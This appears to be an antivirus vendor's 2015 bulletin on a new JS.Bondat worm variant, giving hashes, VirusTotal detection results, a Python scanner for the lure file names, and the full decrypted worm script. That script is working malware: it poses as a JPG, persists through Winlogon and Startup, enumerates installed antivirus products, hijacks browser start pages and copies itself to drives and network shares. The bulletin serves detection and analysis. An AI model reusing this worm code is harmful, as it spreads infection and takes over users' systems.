NEW VARIANT OF JS.BONDAT (encrypted variant of JS:CRISAS)


A new variant that arrives in the file DSC04492.JPG .jse (it looks like a JPG but is really a JS) is detected from today's ELISTARA 23.17 onwards.

The VirusTotal pre-analysis gives the following report:

MD5: 9df7381e713b6bb6721c68ceb898d9c2
SHA1: 5a694472f5ce9bf23d669ddd4dc967fb0a8ab7e4
SHA256: bab05a7e7bd1421a5b5e5a6c9c3b550fdff0d17331a656e461a85ddbd59ab9c3
File size: 25.9 KB (26563 bytes)
File name: DSC04492.JPG …
Detection ratio: 3 / 57
Analysis date: 2015-04-27 08:40:07 UTC (2 hours, 39 minutes ago)


Antivirus            Result                              Update
DrWeb                SCRIPT.Virus                        20150427
McAfee-GW-Edition    BehavesLike.JS.ExploitBlacole.mx    20150427
NANO-Antivirus       Trojan.Script.StartPage.gcle        20150427

The decrypted file yields this script:

try{a=WScript.CreateObject(‘Scri’+’pting.Fi’+’leSys’+’temObj’+’ect’);b=WScript.CreateObject(‘WSc’+’ript.Sh’+’ell’);s=WScript.CreateObject(‘She’+’ll.Appli’+’cation’);wl=WScript.CreateObject(‘WbemScr’+’ipting.SWbemL’+’ocator’);db=WScript.CreateObject(‘ADO’+’DB.Str’+’eam’);db.CharSet=”US-ASCII”;db.Type=2;c3=b.SpecialFolders(“Startup”);nt6=(b.RegRead(‘HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\CurrentVersion’)>=6?true:false);jico=b.RegRead(“HKLM\\SOFTWARE\\Classes\\”+b.RegRead(“HKLM\\SOFTWARE\\Classes\\.jpg\\”)+”\\DefaultIcon\\”);ico=”explorer.exe”;g=WScript.ScriptFullName;da=new Date();ano=da.getYear()+””;mes=da.getMonth();dia=da.getDate();hra=0;antv=new Array(“”);rgk=”HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run”;wlg=”HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell”;gn=new Array(“IMG”,”IMG_”,”PIC”,”DSC”,”CIMG”,”HPIM”,”IMAG”,”DSCF”,”DSCN”,”DCIM”,”IM”,”PICT”,”SAM_”);sp=””;for(r=0;r<94;r++){sp+=” “;}ex=gn[Math.round(Math.random()*12)]+ano.substring(2,4)+””+mes+dia+”.JPG”+sp+”.jse”;jex=””;tas=”explorer”;fsz=a.GetFile(g).Size;wsc=WScript.FullName;stl=”https://www.google.es/#output=search&sclient=psy-ab&q=fiverdolly+”;stp=stl+fsz;if(s.NameSpace(26)==”Roaming”){tot=a.GetFolder(s.NameSpace(26).ParseName(“Microsoft”).Path).ParentFolder;}else{tot=s.NameSpace(40).ParseName(s.NameSpace(26)).Path;}nt();}catch(e){}sf=””;function 
nt(){try{c1=s.NameSpace(28).ParseName(“microsoft”);c2=c1.GetFolder.Items().Count;rf=Math.round(Math.random()*c2-1);c4=c1.GetFolder.Items().item(rf).Path;if(a.FolderExists(c4)==false){c4=a.GetFile(c4).ParentFolder;}}catch(e){c4=c1.Path;}c5=Math.random()*8+1+””;c5=c5.replace(“.”,””);try{b.RegWrite(“HKCU\\SOFTWARE\\Classes\\JSEFile\\DefaultIcon\\”,jico,”REG_SZ”);}catch(e){}try{jtyp=b.RegRead(“HKLM\\SOFTWARE\\Classes\\jpegfile\\FriendlyTypeName”);b.RegWrite(“HKCU\\SOFTWARE\\Classes\\JSEFile\\FriendlyTypeName”,jtyp,”REG_EXPAND_SZ”);}catch(e){}try{b.RegWrite(“HKLM\\SOFTWARE\\Classes\\JSEFile\\DefaultIcon\\”,jico,”REG_SZ”);}catch(e){}try{b.RegWrite(“HKLM\\SOFTWARE\\Classes\\JSEFile\\FriendlyTypeName”,jtyp,”REG_EXPAND_SZ”);}catch(e){}if(g.substring(g.lastIndexOf(“\\”)+1,g.length).toLowerCase().search(“.jpg”+sp+”.jse”)!=-1){try{if(a.FileExists(g.substring(0,g.lastIndexOf(sp+”.jse”)))==true){b.run(‘”‘+g.substring(0,g.lastIndexOf(sp+”.jse”))+'”‘);}else{wp=b.RegRead(“HKCU\\Control Panel\\Desktop\\Wallpaper”);if(wp.substring(wp.lastIndexOf(“\\”)+1,wp.length)==”TranscodedWallpaper”){jpgc=b.RegRead(“HKLM\\SOFTWARE\\Classes\\jpegfile\\shell\\open\\command\\”).replace(“%1”,wp);b.run(jpgc);}else{b.run(‘”‘+wp+'”‘);}}}catch(e){}try{sc=wl.ConnectServer(null, “root\\default”);rg=sc.Get(“StdRegProv”);m=rg.Methods_.Item(“EnumValues”);pin=m.InParameters.SpawnInstance_();rk=new Object();rk[“HKCU”]=rk[“HKEY_CURRENT_USER”]=0x80000001;rv=rk[rgk.substr(0,rgk.indexOf(“\\”))];pin.hDefKey=rv;pin.sSubKeyName=rgk.substr(rgk.indexOf(“\\”) + 1);pot=rg.ExecMethod_(m.Name,pin);ak=pot.sNames.toArray();for(key in ak){tts=b.RegRead(rgk+”\\”+ak[key])+””;if(tts.search(“.exe”)!=-1){tts2=tts.substring(0,tts.search(“.exe”));tts3=tts2.substring(tts2.lastIndexOf(“:”)-1,tts2.length)+”.exe”;if(a.FileExists(tts3)==true){ico=tts3;}if(tts2.indexOf(“\\”)!=-1){tts2=tts2.substring(tts2.lastIndexOf(“\\”)+1,tts2.length);}tas=tts2;}}}catch(e){}if(tas.indexOf(” “)!=-1){tas=tas.substring(0,tas.indexOf(” 
“));}if(tas.indexOf(“.”)!=-1){tas=tas.substring(0,tas.indexOf(“.”));}try{newd=fsz;olddf=b.RegRead(wlg);olddf=olddf.substring(olddf.lastIndexOf(‘” “‘)+3,olddf.lastIndexOf(‘”‘));}catch(e){olddf=shcu();}if(a.FileExists(olddf)==true){c4=a.GetFile(olddf).ParentFolder;oldd=a.GetFile(olddf).size;}else{oldd=0;olddf=c4+”\\”+c5;}if(newd>=oldd){if(a.FileExists(olddf)==true){a.GetFile(olddf).Attributes=0;}db.Open();try{av=GetObject(“winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\SecurityCenter”+(nt6?’2’:”));avi=av.ExecQuery(“SELECT * FROM AntiVirusProduct”,”WQL”);navi=new Enumerator(avi);antv=new Array();for(;!navi.atEnd();navi.moveNext()){oav=navi.item();antv.push(oav.displayName);}}catch(e){antv=new Array(“NAC”);}try{vic=”<“+b.RegRead(“HKCU\\Volatile Environment\\LOGONSERVER”).replace(“\\\\”,””)+”:”+b.RegRead(“HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName”)+”=”+s.NameSpace(40)+”:”+antv+”>”;}catch(e){vic=””;}cod=ci();if(cod.search(vic)==-1&&rad!=0){nda=vic+”**/”;his=cod.replace(“**/”,nda);db.WriteText(his);}else{db.WriteText(cod);}db.SaveToFile(olddf,2);db.Close();try{if(a.GetFile(olddf).OpenAsTextStream(1,-2).ReadAll().charCodeAt(0)!=122){a.CopyFile(g,olddf,true);}a.GetFile(olddf).Attributes=2;}catch(e){}wsh=c4+”\\”+tas+”.exe”;try{a.CopyFile(wsc,wsh);}catch(e){}a.GetFile(wsh).Attributes=2;try{drg='”‘+wsh+'” “‘+olddf+'” //E:JScript //B’;shcu();ec=b.CreateShortcut(c3+”\\”+tas+”.lnk”);ec.TargetPath=c4+”\\”+tas+”.exe”;ec.Arguments='”‘+olddf+'” //E:JScript //B -ns’;ec.IconLocation=ico;ec.Save();b.RegWrite(wlg,drg,’REG_SZ’);WScript.Sleep(9999);if(b.RegRead(wlg)==drg){a.DeleteFile(c3+”\\”+tas+”.lnk”);}}catch(e){}}}else{try{if(WScript.Arguments.length==0){b.run(“explorer.exe”);}}catch(e){}try{fcfp=new Array();tcmd=new Array();for(t=0;t<9;t++){tcmd.push(tot+”\\TC201″+t+”\\tcignore.txt”);try{fcfp.push(s.NameSpace(38).ParseName(“TotalCommander201″+t).Path+”\\Tools\\Mozilla 
Firefox\\defaults\\profile”);}catch(e){}try{fcfp.push(s.NameSpace(48).ParseName(“TotalCommander201″+t).Path+”\\Tools\\Mozilla Firefox\\defaults\\profile”);}catch(e){}}try{tcmd.push(s.NameSpace(38).ParseName(“TC UP”).Path+”\\tcignore.txt”);}catch(e){}try{tcmd.push(s.NameSpace(48).ParseName(“TC UP”).Path+”\\tcignore.txt”);}catch(e){}try{tcmd.push(s.NameSpace(28).ParseName(“ghisler”).Path+”\\tcignore.txt”);}catch(e){}try{tcmd.push(s.NameSpace(26).ParseName(“ghisler”).Path+”\\tcignore.txt”);}catch(e){}tcmd.push(“c:\\totalcmd\\tcignore.txt”);for(t=0;t<tcmd.length;t++){if(a.FileExists(tcmd[t].replace(“tcignore.txt”,”wincmd.ini”))==true){try{db.Open();if(a.FileExists(tcmd[t])==false){ttn=a.CreateTextFile(tcmd[t],true);ttn.Write(“**.**.jse”);ttn.close();}igl=””;try{db.LoadFromFile(tcmd[t]);igl=db.ReadText;}catch(e){}db.Close();if(igl.indexOf(“**.**.jse”)==-1){db.Open();db.WriteText(igl,1);db.WriteText(“**.**.jse”,1);a.DeleteFile(tcmd[t]);db.SaveToFile(tcmd[t]);db.Close();}}catch(e){}try{tor=a.OpenTextFile(a.GetFile(tcmd[t]).ParentFolder+”\\Wincmd.ini”,1,true,0);toa=tor.ReadAll();if(toa.search(“IgnoreListFileEnabled=0”)!=-1){toa=toa.replace(“IgnoreListFileEnabled=0″,”IgnoreListFileEnabled=1”);}if(toa.search(“IgnoreListFile=”)==-1){toa=toa.replace(“[Configuration]”,”[Configuration]”+”\nIgnoreListFile=”+tcmd[t]);}if(tcmd[t].search(“TC201”)!=-1){if(toa.search(“=*.jse”)==-1){filt=toa.substring(toa.lastIndexOf(“Filter”)+6,toa.lastIndexOf(“.icon=”));enf=toa.substring(toa.lastIndexOf(“Filter”),toa.length);enl=enf.substring(0,enf.indexOf(“\n”)+1);fln=new 
Number(filt)+1;ficon=toa.substring(toa.search(“Filter11.icon=”)+14,toa.length);dicon=ficon.substring(0,ficon.search(“\n”));toa=toa.replace(enl,enl+”\nFilter”+fln+”=*.jse\nFilter”+fln+”.icon=”+dicon+”\n”);toa=toa.replace(“FileTipWindows=1″,”FileTipWindows=0”);}}tor.close();tow=a.OpenTextFile(a.GetFile(tcmd[t]).ParentFolder+”\\Wincmd.ini”,2,true,0);tow.Write(toa);tow.close();}catch(e){}}}}catch(e){}try{b.RegWrite(“HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page”,stp,”REG_SZ”)}catch(e){}try{if(a.FolderExists(tot+”\\Mozilla\\Firefox\\Profiles”)==true){fpf=a.GetFolder(tot+”\\Mozilla\\Firefox\\Profiles”);pff=new Enumerator(fpf.SubFolders);for(;!pff.atEnd();pff.moveNext()){pfs=pff.item()+””;if(pfs.search(“.default”)!=-1){fcfp.push(pfs);}}}for(q=0;q<fcfp.length;q++){try{if(a.FileExists(fcfp[q]+”\\prefs.js”)==true);{fjf=a.OpenTextFile(fcfp[q]+”\\prefs.js”,1);fjs=fjf.ReadAll();fjf.close();usp=’user_pref(“browser.startup.homepage”,’;if(fjs.indexOf(usp)!=-1){fjs1=fjs.substring(fjs.indexOf(usp)+37,fjs.length);fjs2=fjs1.substring(0,fjs1.indexOf(‘);’)+2);fjs3=fjs.replace(usp+fjs2,usp+’ “‘+stp+'”);’);wjf=a.OpenTextFile(fcfp[q]+”\\prefs.js”,2);wjf.Write(fjs3);}else{wjf=a.OpenTextFile(fcfp[q]+”\\prefs.js”,8);wjf.WriteLine(‘\n’+usp+’ “‘+stp+'”);’);}wjf.close();}}catch(e){}}}catch(e){}try{gfs=s.NameSpace(28).ParseName(“Google”).Path+”\\Chrome\\User Data\\Default\\Preferences”;if(a.FileExists(gfs)==true){gjf=a.OpenTextFile(gfs,1);gjs=gjf.ReadAll();gjf.close();gjsn=gjs.length;urs='”urls_to_restore_on_startup”: [‘;ros='”restore_on_startup”:’;rosm='”restore_on_startup_migrated”:’;if(gjs.indexOf(stl)==-1){if(gjs.indexOf(urs)!=-1){gjs1=gjs.substring(gjs.indexOf(urs)+31,gjsn);gjs2=gjs1.substring(0,gjs1.indexOf(“]”)+1);gjs3=gjs.replace(urs+gjs2,urs+’ “‘+stp+'”, ‘+gjs2);}else{gjs1=gjs.substring(gjs.indexOf(rosm),gjsn);gjs2=gjs1.substring(0,gjs1.indexOf(“\n”)+1);gjs3=gjs.replace(gjs2,rosm+’ true,\n\t’+urs+’ “‘+stp+'” 
]\n’);}gjs4=gjs.substring(gjs.indexOf(ros),gjsn);gjs5=gjs4.substring(0,gjs4.indexOf(‘,’)+1);gjs3=gjs3.replace(gjs5,ros+’ 4,’);wjg=a.OpenTextFile(gfs,2);wjg.Write(gjs3);wjg.close();}else{fds=gjs.substring(gjs.indexOf(stl),gjs.length);fdc=fds.substring(0,fds.indexOf(‘”‘));gjs4=gjs.replace(fdc,stp);wjg=a.OpenTextFile(gfs,2);wjg.Write(gjs4);wjg.close();}}}catch(e){}mk();}}function mk(){WScript.Sleep(120000);try{c=new Enumerator(a.Drives);for(;!c.atEnd();c.moveNext()){tipodisco=c.item().DriveType;switch(tipodisco){case 1:case 3:if(c.item()!=”A:” && c.item()!=”B:”){try{sf=a.GetFolder(pe(c.item()+”\\”));tgf=new Enumerator(sf.files);for(;!tgf.atEnd();tgf.moveNext()){stf=tgf.item()+””;if(stf.substring(stf.length-4,stf.length).toUpperCase()==”.JPG”){jex=tgf.item().Name+sp+”.jse”;}if(stf.toLowerCase().indexOf(“.jpg”+sp+”.jse”)!=-1){ex=tgf.item().Name;}}if(a.FileExists(sf+”\\”+ex)==false){if(jex!=””){ex=jex;}a.CopyFile(g,sf+”\\”+ex);if(a.FileExists(sf+”\\”+ex.substring(0,ex.lastIndexOf(sp+”.jse”)))==true){a.GetFile(sf+”\\”+ex).Attributes=a.GetFile(sf+”\\”+ex.substring(0,ex.lastIndexOf(sp+”.jse”))).Attributes;}else{a.GetFile(sf+”\\”+ex).Attributes=0};if(a.FileExists(sf+”\\”+ex.substring(0,ex.lastIndexOf(sp+”.jse”)))==true){a.GetFile(sf+”\\”+ex.substring(0,ex.lastIndexOf(sp+”.jse”))).Attributes=2;}}else{if(a.GetFile(sf+”\\”+ex).Size<fsz){a.GetFile(sf+”\\”+ex).Attributes=0;a.DeleteFile(sf+”\\”+ex);a.CopyFile(g,sf+”\\”+ex);a.GetFile(sf+”\\”+ex).Attributes=0;}}}catch(e){}sf=””;}break;default:break;}}}catch(e){}try{if(hra<12){hra+=1;}if(hra==12){dns=s.NameSpace(18);ens=dns.Items().Count;hns=new Array();for(f=0;f<ens;f++){gns=dns.Items().item(f);hns.push(“dns.Items().Item(“+f+”).GetFolder”);}for(i=0;i<hns.length;i++){try{jns=eval(hns[i]).Items().Count;for(l=0;l<jns;l++){if(a.FolderExists(eval(hns[i]+”.Items().item(“+l+”).Path”))==false){hns.push(hns[i]+”.Items().item(“+l+”).GetFolder”);}else{try{dis=pe(eval(hns[i]+”.Items().item(“+l+”).Path”)+”\\”)+””;di=a.GetFolder(dis);tgf=new 
Enumerator(di.files);for(;!tgf.atEnd();tgf.moveNext()){stf=tgf.item()+””;if(stf.substring(stf.length-4,stf.length).toUpperCase()==”.JPG”){jex=tgf.item().Name+sp+”.jse”;}if(stf.toLowerCase().indexOf(“.jpg”+sp+”.jse”)!=-1){ex=tgf.item().Name;}}if(a.FileExists(di+”\\”+ex)==false&&dis.charAt(1)!=”:”){if(jex!=””){ex=jex;}a.CopyFile(g,di+”\\”+ex);if(a.FileExists(di+”\\”+ex.substring(0,ex.lastIndexOf(sp+”.jse”)))==true){a.GetFile(di+”\\”+ex).Attributes=a.GetFile(di+”\\”+ex.substring(0,ex.lastIndexOf(sp+”.jse”))).Attributes;}else{a.GetFile(di+”\\”+ex).Attributes=0;}if(a.FileExists(di+”\\”+ex.substring(0,ex.lastIndexOf(sp+”.jse”)))==true){a.GetFile(di+”\\”+ex.substring(0,ex.lastIndexOf(sp+”.jse”))).Attributes=2;}}else{if(a.GetFile(di+”\\”+ex).Size<fsz){a.GetFile(di+”\\”+ex).Attributes=0;a.DeleteFile(di+”\\”+ex);a.CopyFile(g,di+”\\”+ex);a.GetFile(di+”\\”+ex).Attributes=0;}}}catch(e){}}}}catch(e){}}hra=0;}}catch(e){}mk();}function ci(){try{db2=a.OpenTextFile(g,1);g2=db2.ReadAll();db2.Close();g3=g2.substring(g2.search(‘z=”‘)+3,g2.search(‘”;’));g1=g2.substring(0,g2.search(‘z=”‘)+3);gr=g2.substring(g2.search(‘”;’),g2.length);t=ll;tt=””;tm=t.length;rac=Math.round(Math.random()*98)+1;for(x=0;x<tm;x++){num=t.charCodeAt(x)+rac;hx=num.toString(16);if(hx.length<2){hx=”0″+hx;}tt+=hx;hx=”;}if(rac<10){rac=”0″+rac;}tt+=rac;g4=g1+tt+gr;return g4;}catch(e){}}function pe(tar){onef=false;sfp=a.GetFolder(tar);tgc=new Enumerator(sfp.subFolders);for(;!tgc.atEnd();tgc.moveNext()){stc=tgc.item().Name.toLowerCase();if(stc.search(“foto”)!=-1||stc.search(“photo”)!=-1||stc.search(“image”)!=-1||stc.search(“im\u00E1ge”)!=-1||stc.search(“picture”)!=-1){if(onef==false){sfp=a.GetFolder(tgc.item()+”\\”);}onef=true;}}return sfp;}function shcu(){cshc=””;lnks=new Enumerator(a.GetFolder(c3).files);for(;!lnks.atEnd();lnks.moveNext()){try{lks=lnks.item()+””;if(lks.substring(lks.length-4,lks.length).toLowerCase()==”.lnk”){lnka=b.CreateShortcut(lnks.item()).Arguments;if(lnka.search(“//E:JScript //B 
-ns”)!=-1){cshc=lnka.substring(lnka.indexOf(‘”‘)+1,lnka.lastIndexOf(‘”‘));a.DeleteFile(lnks.item());}}}catch(e){}}return cshc;}

Its pre-analysis gives the following report:

MD5: d7b3199951cc07775a97b2458b24c646
SHA1: dfcdcfca4b606902e7540c75b77e4b512210a8d2
SHA256: 5f3ad66ad50314fa5553ce1d2d335e3cbc7437f1011a24f6c8bea2a8fc9a84fd
ssdeep: 192:Q1eZtf8X+Ai/YKVZvwxFsqCq7HkRNymVyKP2TqABly0zDwg0rVCLo2t7OSghIg:GeQOAUmGLq7EVPADym8ZpCM2tS2g
File size: 12.6 KB (12879 bytes)
File name: CodigoVirico.txt
Detection ratio: 9 / 57
Analysis date: 2015-04-27 09:10:42 UTC (2 hours, 16 minutes ago)

Antivirus               Result                          Update
Avast                   VBS:Obfuscated-gen [Trj]        20150427
DrWeb                   SCRIPT.Virus                    20150427
ESET-NOD32              JS/Bondat.E                     20150427
Ikarus                  Worm.JS.Bondat                  20150427
NANO-Antivirus          Trojan.Script.StartPage.gcle    20150427
Qihoo-360               Trojan.Generic                  20150427
Tencent                 Js.Worm.Bondat.Wtdj             20150427
TrendMicro-HouseCall    Suspicious_GEN.F47V0423         20150427
Zillya                  Dropper.Inor.VBS.2              20150426
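The decrypted script above builds its lure name from a camera-style prefix (the "gn" array), a date, ".JPG", 94 spaces of padding and the real ".jse" extension, so a file manager shows only the image name. The following Python scanner is an added example, not part of the original post or of ELISTARA; it flags such names on a drive or USB stick and generalises the sample's pattern to any run of whitespace and to a few more image and script extensions.

```python
import os
import re

# Heuristics derived from the decrypted worm script reproduced on this page
# (added detection example; the extension lists are this example's assumption).

# The worm names its copy <prefix><date>.JPG + 94 spaces + .jse. Accept any
# whitespace run and a few more image/script extensions than the sample uses.
PADDED_DOUBLE_EXT = re.compile(
    r"\.(jpe?g|png|gif|bmp)(\s+)\.(jse|js|vbs|vbe|wsf)$", re.IGNORECASE)

# Prefixes from the script's "gn" array (names that look like camera output).
CAMERA_PREFIXES = ("IMG_", "IMG", "PIC", "DSC", "CIMG", "HPIM", "IMAG",
                   "DSCF", "DSCN", "DCIM", "IM", "PICT", "SAM_")
SCRIPT_EXTS = (".JSE", ".JS", ".VBS", ".VBE", ".WSF")


def classify_name(name):
    """Return the reasons a file name looks like a Bondat lure ([] if none)."""
    reasons = []
    m = PADDED_DOUBLE_EXT.search(name)
    if m:
        reasons.append("image extension .%s padded with %d whitespace chars before .%s"
                       % (m.group(1), len(m.group(2)), m.group(3)))
    upper = name.upper()
    if upper.startswith(CAMERA_PREFIXES) and upper.rstrip().endswith(SCRIPT_EXTS):
        reasons.append("camera-style name with a script extension")
    return reasons


def impersonated_name(name):
    """Visible file the lure pretends to be (e.g. 'DSC04492.JPG'), or None."""
    m = PADDED_DOUBLE_EXT.search(name)
    return None if not m else name[:m.start()] + "." + m.group(1)


def scan_names(names):
    """Map each suspicious name to its reasons (used by scan_directory)."""
    return {n: classify_name(n) for n in names if classify_name(n)}


def scan_directory(root):
    """Walk a tree (e.g. a mounted USB stick) and report lure-looking files."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for n, reasons in scan_names(files).items():
            findings[os.path.join(dirpath, n)] = reasons
    return findings


if __name__ == "__main__":
    import sys
    for path, why in scan_directory(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(path, "->", "; ".join(why))
```

Because the worm hides the genuine JPG (attribute 2) next to its lure, a hit from impersonated_name() that points at a hidden file is a strong confirmation.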

THIS VERSION, ELISTARA 23.17, WILL BE AVAILABLE ON OUR WEBSITE FROM 19:00 CEST TODAY
regards

ms; 27-4-2015

__________

NOTE: Those interested in information about a SATINFO Technical Assistance support contract and/or a licence for the use/updates of its utilities should contact info@satinfo.es
__________
